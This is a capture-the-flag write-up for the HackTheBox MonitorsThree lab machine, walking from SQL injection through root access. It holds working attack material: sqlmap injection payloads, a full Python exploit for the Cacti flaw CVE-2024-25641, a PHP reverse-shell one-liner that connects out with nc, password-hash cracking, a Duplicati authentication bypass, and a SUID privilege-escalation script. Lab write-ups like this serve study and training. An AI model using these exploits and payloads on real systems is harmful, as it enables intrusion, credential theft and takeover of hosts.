HackTheBox MonitorsThree Writeup
Explore the fundamentals of cybersecurity in the MonitorsThree Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
1
10.10.11.30 cacti.monitorsthree.htb monitorsthree.htb
Script to add hosts automatically
1
2
3
ip="10.10.11.30"
domain="cacti.monitorsthree.htb monitorsthree.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
1
nmap -sCV monitorsthree.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Nmap scan report for monitorsthree.htb (10.10.11.30)
Host is up (0.052s latency).
Other addresses for monitorsthree.htb (not scanned): 10.10.11.30
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: MonitorsThree - Networking Solutions
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQL Injection
Target URL:
http://monitorsthree.htb/login.php
- The page is dynamic (
.php
) and can be tested for SQL injection vulnerabilities.
Testing SQL Injection on Forgot Password Page:
Target URL: http://monitorsthree.htb/forgot_password.php
- Testing payload: sending
'''
triggers an SQL error. - Save the request via Burp as
sql.req
. - Modify the request to
POST http://monitorsthree.htb/forgot_password.php
.
1
sqlmap -r "$(pwd)/sql.req" -dbs --answers="location=N" --batch -p "username" --risk 3
- The injection was successful, revealing the following information:
1
2
3
4
5
6
7
8
9
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=' AND (SELECT 9213 FROM (SELECT(SLEEP(5)))ErVh) AND 'Nepa'='Nepa
---
Available databases [2]:
[*] information_schema
[*] monitorsthree_db
1
2
sqlmap -r "$(pwd)/sql.req" -D monitorsthree_db --tables --answers="location=N" --batch
sqlmap -r "$(pwd)/sql.req" -D monitorsthree_db -T users --dump --answers="location=N" --batch
Brute Force the Hash
Use an hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
1
2
3
4
5
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 0 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 0 /tmp/hash.txt --show
rm -rf /tmp/hash.txt
After logging in, if nothing is found, try using Gobuster for virtual host enumeration:
1
gobuster vhost -u http://monitorsthree.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -r
CVE-2024-25641
1
nano rce
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#!/bin/env python3
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
import os, requests, base64, gzip
from bs4 import BeautifulSoup
import random, string
import argparse
import signal
import sys
def signal_handler(sig, frame):
print("\nCtrl + C detected, exiting...")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
print('''\nPOC CVE-2024-25641\n\n''')
parser = argparse.ArgumentParser(
epilog='''Examples:
./exploit.py http://localhost/cacti admin password
./exploit.py -p './php/rev.php' http://localhost/cacti admin password''',
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument('URL',type=str,help='The target Cacti URL')
parser.add_argument('username',type=str,help='Login username')
parser.add_argument('password',type=str,help='Login password')
parser.add_argument('-p','--payload',type=str,help='Path to the PHP payload file (default: `rev.php` is a reverse shell created by pentestmonkey, Don\'t forget to change the ip & port)',default='./rev.php')
args = parser.parse_args()
URL = args.URL
username = args.username
password = args.password
filename = args.payload
print('[*] Login attempts...')
login_path = '/index.php'
s = requests.Session()
r = s.get(URL)
soup = BeautifulSoup(r.text, 'html.parser')
html_parser = soup.find('input',{'name':'__csrf_magic'})
csrf = html_parser.get('value')
data = {
'__csrf_magic': csrf,
'action': 'login',
'login_username': username,
'login_password': password,
'remember_me': 'on'
}
r = s.post(URL + login_path,data=data)
if 'Logged in' not in r.text:
print('[Failed]')
exit(1)
print('[SUCCESS]')
dest_filename = ''.join(random.choices(string.ascii_lowercase, k=16)) + '.php'
print("[*] Creating the gzip...")
xmldata = """<xml>
<files>
<file>
<name>resource/{}</name>
<data>{}</data>
<filesignature>{}</filesignature>
</file>
</files>
<publickey>{}</publickey>
<signature></signature>
</xml>"""
with open(filename) as data:
filedata = data.read()
keypair = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
)
public_key = keypair.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
filesignature = keypair.sign(
filedata.encode('utf-8'),
padding.PKCS1v15(),
hashes.SHA256()
)
data = xmldata.format(
dest_filename,
base64.b64encode(filedata.encode('utf-8')).decode('utf-8'),
base64.b64encode(filesignature).decode('utf-8'),
base64.b64encode(public_key).decode('utf-8')
)
signature = keypair.sign(
data.encode('utf-8'),
padding.PKCS1v15(),
hashes.SHA256()
)
final_data = data.replace("<signature></signature>", f"<signature>{base64.b64encode(signature).decode('utf-8')}</signature>")
final_data = final_data.encode('utf-8')
gz_filename = f'{dest_filename}.gz'
with open(gz_filename,'wb') as poc:
poc.write(gzip.compress(final_data))
print('[SUCCESS]')
print('GZIP path is',os.getcwd() + '/' + gz_filename)
print('[*] Sending payload...')
import_post1 = '/package_import.php?package_location=0&preview_only=on&remove_orphans=on&replace_svalues=on'
files = {'import_file': open(gz_filename,'rb')}
data = {
'__csrf_magic': csrf,
'trust_signer': 'on',
'save_component_import': 1,
'action': 'save'
}
r = s.post(URL + import_post1, data=data, files=files)
import_post2 = '/package_import.php?header=false'
soup = BeautifulSoup(r.text,'html.parser')
html_parser = soup.find('input',{'title':f'/var/www/html/cacti/resource/{dest_filename}'})
file_id = html_parser.get('id')
data = {
'__csrf_magic': csrf,
'trust_signer':'on',
'data_source_profile':1,
'remove_orphans':'on',
'replace_svalues':'on',
file_id: 'on',
'save_component_import':1,
'preview_only': '',
'action':'save',
}
r = s.post(URL + import_post2, data=data)
print('[SUCCESS]')
file_path = f'/resource/{dest_filename}'
print('You will find the payload in',URL + file_path)
option = input('Do you wanna start the payload ?[Y/n]')
if option.lower() == 'y':
print('Payload is running...')
r = s.get(URL + file_path)
listener:
1
nc -lvnp 9001
upload php revshell:
1
2
3
4
5
chmod +x rce
ip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "<?php shell_exec('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc "$ip" 9001 >/tmp/f'); ?>" > rev.php
./rce http://cacti.monitorsthree.htb/cacti admin greencacti2001
rm -rf rev.php
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
1
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z
to background the shell, then run:
1
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
1
export TERM=xterm;
Dump Database
1
2
cat /var/www/html/cacti/include/config.php | grep 'database_'
mysql -ucactiuser -pcactiuser
1
2
3
4
SHOW DATABASES;
USE cacti;
SHOW TABLES;
SELECT * FROM user_auth;
Brute Force the Hash
Use an hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
1
2
3
4
5
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt
1
su marcus
1
2
cat /home/marcus/user.txt
netstat -tpln
Local 8200
Port 8200 is showing up. Here’s how to forward it without using Chisel, as an alternative method:
On the server, forward traffic with socat:
1
socat TCP-LISTEN:9898,fork TCP:127.0.0.1:8200 &
Now, port 9898 is open to the public. You can access the service at:
http://monitorsthree.htb:9898/login.html
This will allow external access to port 8200 via port 9898 on the public interface.
Get DB info of Duplicati server as discovered
https://github.com/duplicati/duplicati/issues/5197
1
2
strings /opt/duplicati/config/Duplicati-server.sqlite | grep -E 'server-passphrase|server-passphrase-salt' | grep -v 'server-passphrase-t' | sed -E 's/.*server-passphrase-salt//;s/.*server-passphrase//;s/C>$//'
echo 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' | base64 -d | xxd -p -c 256
Log in with a random password and intercept request
Forward the 1st request and select the coockie nonce in the second one and copy the burp uri decoded value
run in the browser f12:
1
2
3
var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a';
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);
In the 2nd intercepted request change the password with the result of the previous js but ctrl+u “url encode” and forward all.
After disable intercept
Create a New Backup:
- Encryption: Set to none (no encryption).
- Destination:
/source/tmp
- Source:
/source/root
- Schedule: Disable the option Automatically run backups.
Restore a File:
- Go to the Restore section.
- Select the file
root.txt
from the backup. - Restore Destination:
/source/home/marcus/
- Enable the option Restore read/write permissions.
Check Restored File:
- Use the following command to view the contents of the restored file:
1
cat /home/marcus/root.txt
We will create a script that sets the SUID permission on /bin/bash
, allowing us to execute bash
with root privileges.
1
echo -e '#!/bin/bash\nchmod u+s /bin/bash' > /tmp/myscript.sh && chmod +x /tmp/myscript.sh
- This script changes the permissions on
/bin/bash
to give the binary the SUID bit (user can run it with root privileges). chmod u+s /bin/bash
: The SUID bit will allow the bash shell to be run as the owner (which isroot
).- Go to the web interface:
<http://monitorsthree.htb:8201/ngax/index.html#/edit/4>
- Edit the existing backup task:
- Advanced Options: Add the run-script-before option and point it to your script:
/source/tmp/myscript.sh
.
- Advanced Options: Add the run-script-before option and point it to your script:
- After editing the backup task, run the backup. This will execute
/tmp/myscript.sh
as part of the backup process, setting the SUID bit on/bin/bash
.
After the backup runs, check if the SUID bit is set on /bin/bash
.
1
ls -la /bin/bash
You should see something like this:
1
-r-Srwsrwx 1 root root 1396520 Mar 14 2024 /bin/bash
- The
-r-Srwsrwx
permissions indicate that the SUID bit is set.
Now, run bash
with the -p
option to maintain root privileges:
1
bash -p
This will drop you into a root shell:
1
2
bash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) egid=0(root) groups=0(root),1000(marcus)
You now have a shell with root privileges (euid=0
).
You can now search for passwords in scripts or configuration files that the system uses, such as the Duplicati client.
1
cat /root/scripts/duplicati-client/duplicati_client.py | grep 'password = "'